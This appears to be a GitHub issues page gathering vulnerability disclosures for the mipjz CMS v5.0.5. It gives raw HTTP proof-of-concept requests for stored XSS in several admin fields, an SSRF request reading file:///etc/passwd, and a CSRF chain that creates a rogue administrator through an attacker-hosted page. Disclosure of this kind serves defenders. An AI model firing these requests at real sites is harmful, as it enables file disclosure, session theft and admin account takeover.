sansanyun / mipjz Goto Github PK

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

1. Add an article, insert js code in the description parameter: xss

POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}

2. Visit the article page, the code is loaded and executed

[Code Details]

1. Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing

2. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

3. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

4. In the "guess you like" area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

Vulnerability location：app/setting/controller/ApiAdminDomainSettings.php：

The problem arises in line 28——39：

$ch = curl_init();
        $options =  array(
            CURLOPT_URL => $api,
            CURLOPT_POST => true,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_POSTFIELDS => implode("\n", $urls),
            CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
        );
	
        curl_setopt_array($ch, $options);
	
        $result = curl_exec($ch);
	

Using curl_exec, $api is controllable and only trim is made to the $api parameter in the above code without any filtering, and finally the json encoded data is returned.

poc:

http://site/index.php?s=/setting/ApiAdminDomainSettings/urlPost

post:
postAddress=file:///etc/passwd&url=xx&id=

This is a stored XSS which allows attacker to insert javascript code into database. When user see the message, attacker is able to steal user's cookie.
Filename /app/widget/controller/ApiAdminWidgetPages.php
Code

public function itemAdd()
    {
        $title = input('post.title');
        $url_name = input('post.url_name');
        $template = input('post.template');
        $content = input('post.content');
        $keywords = input('post.keywords');
        $description = input('post.description');
        if (!$title) {
          return jsonError('请输入名称');
        }
        if (!$url_name) {
          return jsonError('请输入别名');
        }
        $itemInfo = db('WidgetPages')->where('title',$title)->find();
        if ($itemInfo) {
          return jsonError('名称已存在，请重新输入');
        }
        $itemInfo = db('WidgetPages')->where('url_name',$url_name)->find();
        if ($itemInfo) {
          return jsonError('别名已存在，请重新输入');
        }
        db('WidgetPages')->insert(array(
            'id' => uuid(),
            'title' => $title,
            'url_name' => $url_name,
            'template' => $template,
            'keywords' => $keywords,
            'description' => $description,
            'content' => htmlspecialchars($content),
        ));
        return jsonSuccess('成功');
    }

The location of the vulnerability appears in the parameters keywords and description.
**POC_*:

POST /index.php?s=/widget/ApiAdminWidgetPages/itemAdd HTTP/1.1
Host: qing.com
Content-Length: 208
Accept: application/json, text/plain, */*
Origin: http://qing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
dataId: 
Content-Type: application/json;charset=UTF-8
Referer: http://qing.com/index.php?s=/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=af90qhjsiusodrq36a86dgunr0
Connection: close

{"title":"aa","url_name":"a","template":"page","content":"<p><span style=\"\">asdasd</span><br></p>","keywords":"\">aa<script>alert('test');</script>","description":"\">aa<script>alert('test');</script>"}

After the administrator logged in, open the following one page
one.html add a Super Manager.

After the administrator logged in, open the following one page one.html add a Super Manager.

After the administrator logs in, accessing the following two links can add an administrator user

Poc address:https://github.com/sp1d3r/swf_json_csrf
1、Add a user:
http://[Attack domain]/read.html?jsonData={%22groupId%22:1,%22username%22:%22admin123%22,%22password%22:%220192023a7bbd73250516f069df18b500%22,%22rpassword%22:%220192023a7bbd73250516f069df18b500%22}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemAdd
2、Promote user privileges to administrator privileges
Log in with admin123, admin123, and get user UID


Promote user privileges
http://[Attack domain]/read.html?jsonData={"uid":"[The UID]","groupId":1,"username":"admin123","password":"3f7caa3d471688b704b73e9a77b1107f","rpassword":"3f7caa3d471688b704b73e9a77b1107f"}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemEdit

After the administrator logged in, open the following one page one.html add a Super Manager.

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

1. Check the code and find that /app/tag/controller/ApiAdminTagCategory.php does not check and filter the name parameter input by the user

2. Add a tag category, insert the js code at the name parameter: xss

POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 286
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}

3. Delete the label category created in the previous step, and any code will be executed in the pop-up prompt box